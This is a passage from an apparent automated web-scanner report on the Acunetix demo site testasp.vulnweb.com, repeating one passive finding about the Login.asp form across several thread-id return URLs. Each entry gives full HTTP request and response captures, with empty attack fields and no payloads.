</form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form action="" method="POST"> |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
